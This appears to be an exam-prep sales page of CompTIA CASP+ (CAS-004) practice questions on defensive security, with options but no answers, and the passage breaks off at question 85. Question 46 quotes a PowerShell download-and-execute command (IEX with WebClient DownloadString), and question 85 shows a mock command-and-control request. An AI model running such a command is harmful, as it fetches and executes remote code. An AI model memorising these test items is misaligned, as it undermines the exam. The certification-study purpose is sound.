March Sale - Special Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: dpm65

CAS-004 CompTIA Advanced Security Practitioner (CASP+) Exam Questions and Answers

Questions 4

A developer wants to maintain integrity to each module of a program and ensure the code cannot be altered by malicious users.

Which of the following would be BEST for the developer to perform? (Choose two.)

Options:

A.

Utilize code signing by a trusted third party.

B.

Implement certificate-based authentication.

C.

Verify MD5 hashes.

D.

Compress the program with a password.

E.

Encrypt with 3DES.

F.

Make the DACL read-only.

Buy Now
Questions 5

SIMULATION

You are a security analyst tasked with interpreting an Nmap scan output from company’s privileged network.

The company’s hardening guidelines indicate the following:

There should be one primary server or service per device.

Only default ports should be used.

Non-secure protocols should be disabled.

INSTRUCTIONS

Using the Nmap output, identify the devices on the network and their roles, and any open ports that should be closed.

For each device found by Nmap, add a device entry to the Devices Discovered list, with the following information:

The IP address of the device

The primary server or service of the device (Note that each IP should by associated with one service/port only)

The protocol(s) that should be disabled based on the hardening guidelines (Note that multiple ports may need to be closed to comply with the hardening guidelines)

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

CAS-004 Question 5

CAS-004 Question 5

Options:

Buy Now
Questions 6

A security analyst is investigating a possible buffer overflow attack. The following output was found on a user’s workstation:

graphic.linux_randomization.prg

Which of the following technologies would mitigate the manipulation of memory segments?

Options:

A.

NX bit

B.

ASLR

C.

DEP

D.

HSM

Buy Now
Questions 7

An organization's finance system was recently attacked. A forensic analyst is reviewing the contents Of the compromised files for credit card data.

Which of the following commands should the analyst run to BEST determine whether financial data was lost?

CAS-004 Question 7

Options:

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Buy Now
Questions 8

The principal security analyst for a global manufacturer is investigating a security incident related to abnormal behavior in the ICS network. A controller was restarted as part of the troubleshooting process, and the following issue was identified when the controller was restarted:

CAS-004 Question 8

During the investigation, this modified firmware version was identified on several other controllers at the site. The official vendor firmware versions do not have this checksum. Which of the following stages of the MITRE ATT&CK framework for ICS includes this technique?

Options:

A.

Evasion

B.

Persistence

C.

Collection

D.

Lateral movement

Buy Now
Questions 9

A cybersecurity analyst created the following tables to help determine the maximum budget amount the business can justify spending on an improved email filtering system:

CAS-004 Question 9

Which of the following meets the budget needs of the business?

Options:

A.

Filter ABC

B.

Filter XYZ

C.

Filter GHI

D.

Filter TUV

Buy Now
Questions 10

A Chief information Security Officer (CISO) has launched to create a rebuts BCP/DR plan for the entire company. As part of the initiative , the security team must gather data supporting s operational importance for the applications used by the business and determine the order in which the application must be back online. Which of the following be the FIRST step taken by the team?

Options:

A.

Perform a review of all policies an procedures related to BGP a and DR and created an educated educational module that can be assigned to at employees to provide training on BCP/DR events.

B.

Create an SLA for each application that states when the application will come back online and distribute this information to the business units.

C.

Have each business unit conduct a BIA and categories the application according to the cumulative data gathered.

D.

Implement replication of all servers and application data to back up detacenters that are geographically from the central datacenter and release an upload BPA to all clients.

Buy Now
Questions 11

A security engineer investigates an incident and determines that a rogue device is on the network. Further investigation finds that an employee's personal device has been set up to access company resources and does not comply with standard security controls. Which of the following should the security engineer recommend to reduce the risk of future reoccurrence?

Options:

A.

Require device certificates to access company resources.

B.

Enable MFA at the organization's SSO portal.

C.

Encrypt all workstation hard drives.

D.

Hide the company wireless SSID.

Buy Now
Questions 12

A security engineer is working for a service provider and analyzing logs and reports from a new EDR solution, which is installed on a small group of workstations. Later that day, another security engineer receives an email from two developers reporting the software being used for development activities is now blocked. The developers have not made any changes to the software being used. Which of the following is the EDR reporting?

Options:

A.

True positive

B.

False negative

C.

False positive

D.

True negative

Buy Now
Questions 13

A security architect is working with a new customer to find a vulnerability assessment solution that meets the following requirements:

• Fast scanning

• The least false positives possible

• Signature-based

• A low impact on servers when performing a scan

In addition, the customer has several screened subnets, VLANs, and branch offices. Which of the following will best meet the customer's needs?

Options:

A.

Authenticated scanning

B.

Passive scanning

C.

Unauthenticated scanning

D.

Agent-based scanning

Buy Now
Questions 14

An organization is designing a MAC scheme (or critical servers running GNU/Linux. The security engineer is investigating SELinux but is confused about how to read labeling contexts. The engineer executes the command stat ./secretfile and receives the following output:

CAS-004 Question 14

Which of the following describes the correct order of labels shown in the output above?

Options:

A.

Role, type MLS level, and user identity

B.

Role, user identity, object, and MLS level

C.

Object MLS level, role, and type

D.

User identity, role, type, and MLS level

E.

Object, user identity, role, and MLS level

Buy Now
Questions 15

A development team created a mobile application that contacts a company’s back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.

Which of the following would BEST safeguard the APIs? (Choose two.)

Options:

A.

Bot protection

B.

OAuth 2.0

C.

Input validation

D.

Autoscaling endpoints

E.

Rate limiting

F.

CSRF protection

Buy Now
Questions 16

Due to budget constraints, an organization created a policy that only permits vulnerabilities rated high and critical according to CVSS to be fixed or mitigated. A security analyst notices that many vulnerabilities that were previously scored as medium are now breaching higher thresholds. Upon further investigation, the analyst notices certain ratings are not aligned with the approved system categorization. Which of the following can the analyst do to get a better picture of the risk while adhering to the organization's policy?

Options:

A.

Align the exploitability metrics to the predetermined system categorization.

B.

Align the remediation levels to the predetermined system categorization.

C.

Align the impact subscore requirements to the predetermined system categorization.

D.

Align the attack vectors to the predetermined system categorization.

Buy Now
Questions 17

A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes.

Which of the following should a security architect recommend?

Options:

A.

A DLP program to identify which files have customer data and delete them

B.

An ERP program to identify which processes need to be tracked

C.

A CMDB to report on systems that are not configured to security baselines

D.

A CRM application to consolidate the data and provision access based on the process and need

Buy Now
Questions 18

A company Is adopting a new artificial-intelligence-based analytics SaaS solution. This Is the company's first attempt at using a SaaS solution, and a security architect has been asked to determine any future risks. Which of the following would be the GREATEST risk In adopting this solution?

Options:

A.

The inability to assign access controls to comply with company policy

B.

The inability to require the service provider process data in a specific country

C.

The inability to obtain company data when migrating to another service

D.

The inability to conduct security assessments against a service provider

Buy Now
Questions 19

An e-commerce company is running a web server on premises, and the resource utilization is usually less than 30%. During the last two holiday seasons, the server experienced performance issues because of too many connections, and several customers were not able to finalize purchase orders. The company is looking to change the server configuration to avoid this kind of performance issue.

Which of the following is the MOST cost-effective solution?

Options:

A.

Move the server to a cloud provider.

B.

Change the operating system.

C.

Buy a new server and create an active-active cluster.

D.

Upgrade the server with a new one.

Buy Now
Questions 20

As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents.

Which of the following BEST describes this kind of risk response?

Options:

A.

Risk rejection

B.

Risk mitigation

C.

Risk transference

D.

Risk avoidance

Buy Now
Questions 21

A company’s product site recently had failed API calls, resulting in customers being unable to check out and purchase products. This type of failure could lead to the loss of customers and damage to the company’s reputation in the market.

Which of the following should the company implement to address the risk of system unavailability?

Options:

A.

User and entity behavior analytics

B.

Redundant reporting systems

C.

A self-healing system

D.

Application controls

Buy Now
Questions 22

A security architect works for a manufacturing organization that has many different branch offices. The architect is looking for a way to reduce traffic and ensure the branch offices receive the latest copy of revoked certificates issued by the CA at the organization’s headquarters location. The solution must also have the lowest power requirement on the CA.

Which of the following is the BEST solution?

Options:

A.

Deploy an RA on each branch office.

B.

Use Delta CRLs at the branches.

C.

Configure clients to use OCSP.

D.

Send the new CRLs by using GPO.

Buy Now
Questions 23

A security engineer has been asked to close all non-secure connections from the corporate network. The engineer is attempting to understand why the corporate UTM will not allow users to download email via IMAPS. The engineer formulates a theory and begins testing by creating the firewall ID 58, and users are able to download emails correctly by using IMAP instead. The network comprises three VLANs:

CAS-004 Question 23

The security engineer looks at the UTM firewall rules and finds the following:

CAS-004 Question 23

Which of the following should the security engineer do to ensure IMAPS functions properly on the corporate user network?

Options:

A.

Contact the email service provider and ask if the company IP is blocked.

B.

Confirm the email server certificate is installed on the corporate computers.

C.

Make sure the UTM certificate is imported on the corporate computers.

D.

Create an IMAPS firewall rule to ensure email is allowed.

Buy Now
Questions 24

UESTION NO: 36

Which of the following is a benefit of using steganalysis techniques in forensic response?

Options:

A.

Breaking a symmetric cipher used in secure voice communications

B.

Determining the frequency of unique attacks against DRM-protected media

C.

Maintaining chain of custody for acquired evidence

D.

Identifying least significant bit encoding of data in a .wav file

Buy Now
Questions 25

A security engineer needs to recommend a solution that will meet the following requirements:

Identify sensitive data in the provider’s network

Maintain compliance with company and regulatory guidelines

Detect and respond to insider threats, privileged user threats, and compromised accounts

Enforce datacentric security, such as encryption, tokenization, and access control

Which of the following solutions should the security engineer recommend to address these requirements?

Options:

A.

WAF

B.

CASB

C.

SWG

D.

DLP

Buy Now
Questions 26

A security analyst needs to recommend a remediation to the following threat:

CAS-004 Question 26

Which of the following actions should the security analyst propose to prevent this successful exploitation?

Options:

A.

Patch the system.

B.

Update the antivirus.

C.

Install a host-based firewall.

D.

Enable TLS 1.2.

Buy Now
Questions 27

A company wants to improve the security of its web applications that are running on in-house servers A risk assessment has been performed and the following capabilities are desired:

• Terminate SSL connections at a central location

• Manage both authentication and authorization for incoming and outgoing web service calls

• Advertise the web service API

• Implement DLP and anti-malware features

Which of the following technologies will be the BEST option?

Options:

A.

WAF

B.

XML gateway

C.

ESB gateway

D.

API gateway

Buy Now
Questions 28

An analyst received a list of IOCs from a government agency. The attack has the following characteristics:

1. The attack starts with bulk phishing.

2. If a user clicks on the link, a dropper is downloaded to the computer.

3. Each of the malware samples has unique hashes tied to the user.

The analyst needs to identify whether existing endpoint controls are effective. Which of the following risk mitigation techniques should the analyst use?

Options:

A.

Update the incident response plan.

B.

Blocklist the executable.

C.

Deploy a honeypot onto the laptops.

D.

Detonate in a sandbox.

Buy Now
Questions 29

A new requirement for legislators has forced a government security team to develop a validation process to verify the integrity of a downloaded file and the sender of the file Which of the following is the BEST way for the security team to comply with this requirement?

Options:

A.

Digital signature

B.

Message hash

C.

Message digest

D.

Message authentication code

Buy Now
Questions 30

A company with only U S -based customers wants to allow developers from another country to work on the company's website However, the company plans to block normal internet traffic from the other country Which of the following strategies should the company use to accomplish this objective? (Select two).

Options:

A.

Block foreign IP addresses from accessing the website

B.

Have the developers use the company's VPN

C.

Implement a WAP for the website

D.

Give the developers access to a jump box on the network

E.

Employ a reverse proxy for the developers

F.

Use NAT to enable access for the developers

Buy Now
Questions 31

A business stores personal client data of individuals residing in the EU in order to process requests for mortgage loan approvals.

Which of the following does the business’s IT manager need to consider?

Options:

A.

The availability of personal data

B.

The right to personal data erasure

C.

The company’s annual revenue

D.

The language of the web application

Buy Now
Questions 32

Which of the following technologies allows CSPs to add encryption across multiple data storages?

Options:

A.

Symmetric encryption

B.

Homomorphic encryption

C.

Data dispersion

D.

Bit splitting

Buy Now
Questions 33

A company’s Chief Information Security Officer is concerned that the company’s proposed move to the cloud could lead to a lack of visibility into network traffic flow logs within the VPC.

Which of the following compensating controls would be BEST to implement in this situation?

Options:

A.

EDR

B.

SIEM

C.

HIDS

D.

UEBA

Buy Now
Questions 34

An organization has an operational requirement with a specific equipment vendor The organization is located in the United States, but the vendor is located in another region Which of the following risks would be most concerning to the organization in the event of equipment failure?

Options:

A.

Support may not be available during all business hours

B.

The organization requires authorized vendor specialists.

C.

Each region has different regulatory frameworks to follow

D.

Shipping delays could cost the organization money

Buy Now
Questions 35

A company is migrating from company-owned phones to a BYOD strategy for mobile devices. The pilot program will start with the executive management team and be rolled out to the rest of the staff in phases. The company’s Chief Financial Officer loses a phone multiple times a year.

Which of the following will MOST likely secure the data on the lost device?

Options:

A.

Require a VPN to be active to access company data.

B.

Set up different profiles based on the person’s risk.

C.

Remotely wipe the device.

D.

Require MFA to access company applications.

Buy Now
Questions 36

Which of the following is the BEST disaster recovery solution when resources are running in a cloud environment?

Options:

A.

Remote provider BCDR

B.

Cloud provider BCDR

C.

Alternative provider BCDR

D.

Primary provider BCDR

Buy Now
Questions 37

A Chief Security Officer (CSO) is concerned about the number of successful ransomware attacks that have hit the company. The data Indicates most of the attacks came through a fake email. The company has added training, and the CSO now wants to evaluate whether the training has been successful. Which of the following should the CSO implement?

Options:

A.

Simulating a spam campaign

B.

Conducting a sanctioned vishing attack

C.

Performing a risk assessment

D.

Executing a penetration test

Buy Now
Questions 38

After the latest risk assessment, the Chief Information Security Officer (CISO) decides to meet with the development and security teams to find a way to reduce the security task workload The CISO would like to:

* Have a solution that uses API to communicate with other security tools

* Use the latest technology possible

* Have the highest controls possible on the solution

Which of following is the best option to meet these requirements?

Options:

A.

EDR

B.

CSP

C.

SOAR

D.

CASB

Buy Now
Questions 39

A company with multiple locations has taken a cloud-only approach to its infrastructure The company does not have standard vendors or systems resulting in a mix of various solutions put in place by each location The Chief Information Security Officer wants to ensure that the internal security team has visibility into all platforms Which of the following best meets this objective?

Options:

A.

Security information and event management

B.

Cloud security posture management

C.

SNMFV2 monitoring and log aggregation

D.

Managed detection and response services from a third party

Buy Now
Questions 40

After a server was compromised an incident responder looks at log files to determine the attack vector that was used The incident responder reviews the web server log files from the time before an unexpected SSH session began:

CAS-004 Question 40

Which of the following is the most likely vulnerability that was exploited based on the log files?

Options:

A.

Directory traversal revealed the hashed SSH password, which was used to access the server.

B.

A SQL injection was used during the ordering process to compromise the database server

C.

The root password was easily guessed and used as a parameter lo open a reverse shell

D.

An outdated third-party PHP plug-in was vulnerable to a known remote code execution

Buy Now
Questions 41

A security engineer is re-architecting a network environment that provides regional electric distribution services. During a pretransition baseline assessment, the engineer identified the following security-relevant characteristics of the environment:

• Enterprise IT servers and supervisory industrial systems share the same subnet.

• Supervisory controllers use the 750MHz band to direct a portion of fielded PLCs.

• Command and telemetry messages from industrial control systems are unencrypted and unauthenticated.

Which of the following re-architecture approaches would be best to reduce the company's risk?

Options:

A.

Implement a one-way guard between enterprise IT services and mission-critical systems, obfuscate legitimate RF signals by broadcasting noise, and implement modern protocols to authenticate ICS messages.

B.

Characterize safety-critical versus non-safety-critical systems, isolate safety-critical systems from other systems, and increase the directionality of RF links in the field.

C.

Create a new network segment for enterprise IT servers, configure NGFW to enforce a well-defined segmentation policy, and implement a WIDS to monitor the spectrum.

D.

Segment supervisory controllers from field PLCs, disconnect the entire network from the internet, and use only the 750MHz link for controlling energy distribution services.

Buy Now
Questions 42

A security analyst is validating the MAC policy on a set of Android devices. The policy was written to ensure non-critical applications are unable to access certain resources. When reviewing dmesg, the analyst notes many entries such as:

Despite the deny message, this action was still permit following is the MOST likely fix for this issue?

Options:

A.

Add the objects of concern to the default context.

B.

Set the devices to enforcing

C.

Create separate domain and context files for irc.

D.

Rebuild the policy, reinstall, and test.

Buy Now
Questions 43

A security analyst has been provided the following partial Snort IDS rule to review and add into the company's Snort IDS to identify a CVE:

CAS-004 Question 43

Which of the following should the analyst recommend to mitigate this type of vulnerability?

Options:

A.

IPSec rules

B.

OS patching

C.

Two-factor authentication

D.

TCP wrappers

Buy Now
Questions 44

A major broadcasting company that requires continuous availability to streaming content needs to be resilient against DDoS attacks Which of the following is the MOST important infrastructure security design element to prevent an outage7

Options:

A.

Supporting heterogeneous architecture

B.

Leveraging content delivery network across multiple regions

C.

Ensuring cloud autoscaling is in place

D.

Scaling horizontally to handle increases in traffic

Buy Now
Questions 45

A security engineer needs to select the architecture for a cloud database that will protect an organization's sensitive data. The engineer has a choice between a single-tenant or a multitenant database architecture offered by a cloud vendor. Which of the following best describes the security benefits of the single-tenant option? (Select two).

Options:

A.

Most cost-effective

B.

Ease of backup and restoration

C.

High degree of privacy

D.

Low resilience to side-channel attacks

E.

Full control and ability to customize

F.

Increased geographic diversity

Buy Now
Questions 46

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl ');whois

Which of the following security controls would have alerted and prevented the next phase of the attack?

Options:

A.

Antivirus and UEBA

B.

Reverse proxy and sandbox

C.

EDR and application approved list

D.

Forward proxy and MFA

Buy Now
Questions 47

A senior security analyst is helping the development team improve the security of an application that is being developed. The developers use third-party libraries and applications. The software in development used old, third-party packages that were not replaced before market distribution. Which of the following should be implemented into the SDLC to resolve the issue?

Options:

A.

Software composition analysis

B.

A SCAP scanner

C.

ASAST

D.

A DAST

Buy Now
Questions 48

A company is experiencing a large number of attempted network-based attacks against its online store. To determine the best course of action, a security analyst reviews the following logs.

CAS-004 Question 48

Which of the following should the company do next to mitigate the risk of a compromise from these attacks?

Options:

A.

Restrict HTTP methods.

B.

Perform parameterized queries.

C.

Implement input sanitization.

D.

Validate content types.

Buy Now
Questions 49

A security analyst has been tasked with assessing a new API The analyst needs to be able to test for a variety of different inputs, both malicious and benign, in order to close any vulnerabilities Which of the following should the analyst use to achieve this goal?

Options:

A.

Static analysis

B.

Input validation

C.

Fuzz testing

D.

Post-exploitation

Buy Now
Questions 50

A systems engineer needs to develop a solution that uses digital certificates to allow authentication to laptops. Which of the following authenticator types would be most appropriate for the engineer to include in the design?

Options:

A.

TOTP token

B.

Device certificate

C.

Smart card

D.

Biometric

Buy Now
Questions 51

A healthcare system recently suffered from a ransomware incident As a result the board of directors decided to hire a security consultant to improve existing network security. The security consultant found that the healthcare network was completely flat, had no privileged access limits and had open RDP access to servers with personal health information. As the consultant builds the remediation plan, which of the following solutions would BEST solve these challenges? (Select THREE).

Options:

A.

SD-WAN

B.

PAM

C.

Remote access VPN

D.

MFA

E.

Network segmentation

F.

BGP

G.

NAC

Buy Now
Questions 52

The information security manager at a 24-hour manufacturing facility is reviewing a contract for potential risks to the organization. The contract pertains to the support of printers and multifunction devices during non-standard business hours. Which of the following will the security manager most likely identify as a risk?

Options:

A.

Print configurations settings for locked print jobs

B.

The lack of an NDA with the company that supports its devices

C.

The lack of an MSA to govern other services provided by the service provider

D.

The lack of chain of custody for devices prior to deployment at the company

Buy Now
Questions 53

A SOC analyst received an alert about a potential compromise and is reviewing the following SIEM logs:

CAS-004 Question 53

Which of the following is the most appropriate action for the SOC analyst to recommend?

Options:

A.

Disabling account JDoe to prevent further lateral movement

B.

Isolating laptop314 from the network

C.

Alerting JDoe about the potential account compromise

D.

Creating HIPS and NIPS rules to prevent logins

Buy Now
Questions 54

The Chief Information Security Officer (CISO) is working with a new company and needs a legal “document to ensure all parties understand their roles during an assessment. Which of the following should the CISO have each party sign?

Options:

A.

SLA

B.

ISA

C.

Permissions and access

D.

Rules of engagement

Buy Now
Questions 55

A developer needs to implement PKI in an autonomous vehicle's software in the most efficient and labor-effective way possible. Which of the following will the developer MOST likely implement?

Options:

A.

Certificate chain

B.

Root CA

C.

Certificate pinning

D.

CRL

E.

OCSP

Buy Now
Questions 56

Which of the following indicates when a company might not be viable after a disaster?

Options:

A.

Maximum tolerable downtime

B.

Recovery time objective

C.

Mean time to recovery

D.

Annual loss expectancy

Buy Now
Questions 57

Which of the following objectives BEST supports leveraging tabletop exercises in business continuity planning?

Options:

A.

Determine the optimal placement of hot/warm sites within the enterprise architecture.

B.

Create new processes for identified gaps in continuity planning.

C.

Establish new staff roles and responsibilities for continuity of operations.

D.

Assess the effectiveness of documented processes against a realistic scenario.

Buy Now
Questions 58

A CSP, which wants to compete in the market, has been approaching companies in an attempt to gain business. The CSP is able to provide the same uptime as other CSPs at a markedly reduced cost. Which of the following would be the MOST significant business risk to a company that signs a contract with this CSP?

Options:

A.

Resource exhaustion

B.

Geographic location

C.

Control plane breach

D.

Vendor lock-in

Buy Now
Questions 59

Company A acquired Company B. During an initial assessment, the companies discover they are using the same SSO system. To help users with the transition, Company A is requiring the following:

• Before the merger is complete, users from both companies should use a single set of usernames and passwords.

• Users in the same departments should have the same set of rights and privileges, but they should have different sets of rights and privileges if they have different IPs.

• Users from Company B should be able to access Company A's available resources.

Which of the following are the BEST solutions? (Select TWO).

Options:

A.

Installing new Group Policy Object policies

B.

Establishing one-way trust from Company B to Company A

C.

Enabling multifactor authentication

D.

Implementing attribute-based access control

E.

Installing Company A's Kerberos systems in Company B's network

F.

Updating login scripts

Buy Now
Questions 60

The CI/CD pipeline requires code to have close to zero defects and zero vulnerabilities. The current process for any code releases into production uses two-week Agile sprints. Which of the following would BEST meet the requirement?

Options:

A.

An open-source automation server

B.

A static code analyzer

C.

Trusted open-source libraries

D.

A single code repository for all developers

Buy Now
Questions 61

An architectural firm is working with its security team to ensure that any draft images that are leaked to the public can be traced back to a specific external party. Which of the following would BEST accomplish this goal?

Options:

A.

Properly configure a secure file transfer system to ensure file integrity.

B.

Have the external parties sign non-disclosure agreements before sending any images.

C.

Only share images with external parties that have worked with the firm previously.

D.

Utilize watermarks in the images that are specific to each external party.

Buy Now
Questions 62

A hospitality company experienced a data breach that included customer Pll. The hacker used social engineering to convince an employee to grant a third-party application access to some company documents within a cloud file storage service. Which of the following is the BEST solution to help prevent this type of attack in the future?

Options:

A.

NGFW for web traffic inspection and activity monitoring

B.

CSPM for application configuration control

C.

Targeted employee training and awareness exercises

D.

CASB for OAuth application permission control

Buy Now
Questions 63

An organization is running its e-commerce site in the cloud. The capacity is sufficient to meet the organization's needs throughout most of the year, except during the holidays when the organization plans to introduce a new line of products and expects an increase in traffic. The organization is not sure how well its products will be received. To address this issue, the organization needs to ensure that:

* System capacity is optimized.

* Cost is reduced.

Which of the following should be implemented to address these requirements? (Select TWO).

Options:

A.

Containerization

B.

Load balancer

C.

Microsegmentation

D.

Autoscaling

E.

CDN

F.

WAF

Buy Now
Questions 64

A network administrator for a completely air-gapped and closed system has noticed that anomalous external files have been uploaded to one of the critical servers. The administrator has reviewed logs

in the SIEM that were collected from security appliances, network infrastructure devices, and endpoints. Which of the following processes, if executed, would be MOST likely to expose an attacker?

Options:

A.

Reviewing video from IP cameras within the facility

B.

Reconfiguring the SIEM connectors to collect data from the perimeter network hosts

C.

Implementing integrity checks on endpoint computing devices

D.

Looking for privileged credential reuse on the network

Buy Now
Questions 65

A security consultant has been asked to recommend a secure network design that would:

• Permit an existing OPC server to communicate with a new Modbus server that is controlling electrical relays.

• Limit operational disruptions.

Due to the limitations within the Modbus protocol, which of the following configurations should the security engineer recommend as part of the solution?

Options:

A.

Restrict inbound traffic so that only the OPC server is permitted to reach the Modbus server on port 135.

B.

Restrict outbound traffic so that only the OPC server is permitted to reach the Modbus server on port 102.

C.

Restrict outbound traffic so that only the OPC server is permitted to reach the Modbus server on port 5000.

D.

Restrict inbound traffic so that only the OPC server is permitted to reach the Modbus server on port 502.

Buy Now
Questions 66

To save time, a company that is developing a new VPN solution has decided to use the OpenSSL library within Its proprietary software. Which of the following should the company consider to maximize risk reduction from vulnerabilities introduced by OpenSSL?

Options:

A.

Include stable, long-term releases of third-party libraries instead of using newer versions.

B.

Ensure the third-party library implements the TLS and disable weak ciphers.

C.

Compile third-party libraries into the main code statically instead of using dynamic loading.

D.

Implement an ongoing, third-party software and library review and regression testing.

Buy Now
Questions 67

A global organization's Chief Information Security Officer (CISO) has been asked to analyze the risks involved in a plan to move the organization's current MPLS-based WAN network to use commodity Internet and SD-WAN hardware. The SD-WAN provider is currently highly regarded but Is a regional provider. Which of the following is MOST likely identified as a potential risk by the CISO?

Options:

A.

The SD-WAN provider would not be able to handle the organization's bandwidth requirements.

B.

The operating costs of the MPLS network are too high for the organization.

C.

The SD-WAN provider uses a third party for support.

D.

Internal IT staff will not be able to properly support remote offices after the migration.

Buy Now
Questions 68

A client is adding scope to a project. Which of the following processes should be used when requesting updates or corrections to the client's systems?

Options:

A.

The implementation engineer requests direct approval from the systems engineer and the Chief Information Security Officer.

B.

The change control board must review and approve a submission.

C.

The information system security officer provides the systems engineer with the system updates.

D.

The security engineer asks the project manager to review the updates for the client's system.

Buy Now
Questions 69

A security architect updated the security policy to require a proper way to verify that packets received between two parties have not been tampered with and the connection remains private. Which of the following cryptographic techniques can be used to ensure the security policy is being enforced properly?

Options:

A.

MD5-based envelope method

B.

HMAC SHA256

C.

PBKDF2

D.

PGP

Buy Now
Questions 70

A university issues badges through a homegrown identity management system to all staff and students. Each week during the summer, temporary summer school students arrive and need to be issued a badge to access minimal campus resources. The security team received a report from an outside auditor indicating the homegrown system is not consistent with best practices in the security field.

Which of the following should the security team recommend FIRST?

Options:

A.

Investigating a potential threat identified in logs related to the identity management system

B.

Updating the identity management system to use discretionary access control

C.

Beginning research on two-factor authentication to later introduce into the identity management system

D.

Working with procurement and creating a requirements document to select a new IAM system/vendor

Buy Now
Questions 71

In a cloud environment, the provider offers relief to an organization's teams by sharing in many of the operational duties. In a shared responsibility model, which of the following responsibilities belongs to the provider in a Paas implementation?

Options:

A.

Application-specific data assets

B.

Application user access management

C.

Application-specific logic and code

D.

Application/platform software

Buy Now
Questions 72

An organization is in frequent litigation and has a large number of legal holds. Which of the following types of functionality should the organization's new email system provide?

Options:

A.

DLP

B.

Encryption

C.

E-discovery

D.

Privacy-level agreements

Buy Now
Questions 73

A security consultant is designing an infrastructure security solution for a client company that has provided the following requirements:

• Access to critical web services at the edge must be redundant and highly available.

• Secure access services must be resilient to a proprietary zero-day vulnerability in a single component.

• Automated transition of secure access solutions must be able to be triggered by defined events or manually by security operations staff.

Which of the following solutions BEST meets these requirements?

Options:

A.

Implementation of multiple IPSec VPN solutions with diverse endpoint configurations enabling user optionality in the selection of a remote access provider

B.

Remote access services deployed using vendor-diverse redundancy with event response driven by playbooks.

C.

Two separate secure access solutions orchestrated by SOAR with components provided by the same vendor for compatibility.

D.

Reverse TLS proxy configuration using OpenVPN/OpenSSL with scripted failover functionality that connects critical web services out to endpoint computers.

Buy Now
Questions 74

A cloud security architect has been tasked with selecting the appropriate solution given the following:

* The solution must allow the lowest RTO possible.

* The solution must have the least shared responsibility possible.

« Patching should be a responsibility of the CSP.

Which of the following solutions can BEST fulfill the requirements?

Options:

A.

Paas

B.

laas

C.

Private

D.

Saas

Buy Now
Questions 75

A company is on a deadline to roll out an entire CRM platform to all users at one time. However, the company is behind schedule due to reliance on third-party vendors. Which of the following development approaches will allow the company to begin releases but also continue testing and development for future releases?

Options:

A.

Implement iterative software releases.

B.

Revise the scope of the project to use a waterfall approach

C.

Change the scope of the project to use the spiral development methodology.

D.

Perform continuous integration.

Buy Now
Questions 76

An investigator is attempting to determine if recent data breaches may be due to issues with a company's web server that offers news subscription services. The investigator has gathered the following

data:

• Clients successfully establish TLS connections to web services provided by the server.

• After establishing the connections, most client connections are renegotiated

• The renegotiated sessions use cipher suite SHR.

Which of the following is the MOST likely root cause?

Options:

A.

The clients disallow the use of modern cipher suites

B.

The web server is misconfigured to support HTTP/1.1.

C.

A ransomware payload dropper has been installed

D.

An entity is performing downgrade attacks on path

Buy Now
Questions 77

A mobile administrator is reviewing the following mobile device DHCP logs to ensure the proper mobile settings are applied to managed devices:

CAS-004 Question 77

Which of the following mobile configuration settings is the mobile administrator verifying?

Options:

A.

Service set identifier authentication

B.

Wireless network auto joining

C.

802.1X with mutual authentication

D.

Association MAC address randomization

Buy Now
Questions 78

An administrator at a software development company would like to protect the integrity of the company's applications with digital signatures. The developers report that the signing process keeps failing on all applications. The same key pair used for signing, however, is working properly on the website, is valid, and is issued by a trusted CA. Which of the following is MOST likely the cause of the

signature failing?

Options:

A.

The NTP server is set incorrectly for the developers

B.

The CA has included the certificate in its CRL.

C.

The certificate is set for the wrong key usage.

D.

Each application is missing a SAN or wildcard entry on the certificate

Buy Now
Questions 79

A security engineer has been informed by the firewall team that a specific Windows workstation is part of a command-and-control network. The only information the security engineer is receiving is that

the traffic is occurring on a non-standard port (TCP 40322). Which of the following commands should the security engineer use FIRST to find the malicious process?

Options:

A.

tcpdump

B.

netstar

C.

tasklist

D.

traceroute

E.

ipconfig

Buy Now
Questions 80

A software development company is building a new mobile application for its social media platform. The company wants to gain its users' trust by reducing the risk of on-path attacks between the mobile

client and its servers and by implementing stronger digital trust. To support users' trust, the company has released the following internal guidelines:

• Mobile clients should verify the identity of all social media servers locally.

• Social media servers should improve TLS performance of their certificate status

• Social media servers should inform the client to only use HTTPS.

Given the above requirements, which of the following should the company implement? (Select TWO).

Options:

A.

Quick UDP internet connection

B.

OCSP stapling

C.

Private CA

D.

DNSSEC

E.

CRL

F.

HSTS

G.

Distributed object model

Buy Now
Questions 81

Which of the following processes involves searching and collecting evidence during an investigation or lawsuit?

Options:

A.

E-discovery

B.

Review analysis

C.

Information governance

D.

Chain of custody

Buy Now
Questions 82

An IPSec solution is being deployed. The configuration files for both the VPN

concentrator and the AAA server are shown in the diagram.

Complete the configuration files to meet the following requirements:

• The EAP method must use mutual certificate-based authentication (With

issued client certificates).

• The IKEv2 Cipher suite must be configured to the MOST secure

authenticated mode of operation,

• The secret must contain at least one uppercase character, one lowercase

character, one numeric character, and one special character, and it must

meet a minimum length requirement of eight characters,

INSTRUCTIONS

Click on the AAA server and VPN concentrator to complete the configuration.

Fill in the appropriate fields and make selections from the drop-down menus.

CAS-004 Question 82

VPN Concentrator:

CAS-004 Question 82

AAA Server:

CAS-004 Question 82

Options:

Buy Now
Questions 83

A company wants to refactor a monolithic application to take advantage of cloud native services and service microsegmentation to secure sensitive application components. Which of the following should the company implement to ensure the architecture is portable?

Options:

A.

Virtualized emulators

B.

Type 2 hypervisors

C.

Orchestration

D.

Containerization

Buy Now
Questions 84

Which of the following describes the system responsible for storing private encryption/decryption files with a third party to ensure these files are stored safely?

Options:

A.

Key escrow

B.

TPM

C.

Trust models

D.

Code signing

Buy Now
Questions 85

A systems administrator was given the following IOC to detect the presence of a malicious piece of software communicating with its command-and-control server:

post /malicious. php

User-Agent: Malicious Tool V 1.0

Host: www.rcalicious.com

The IOC documentation suggests the URL is the only part that could change. Which of the following regular expressions would allow the systems administrator to determine if any of the company hosts are compromised, while reducing false positives?

Options:

A.

User-Agent: Malicious Tool. *

B.

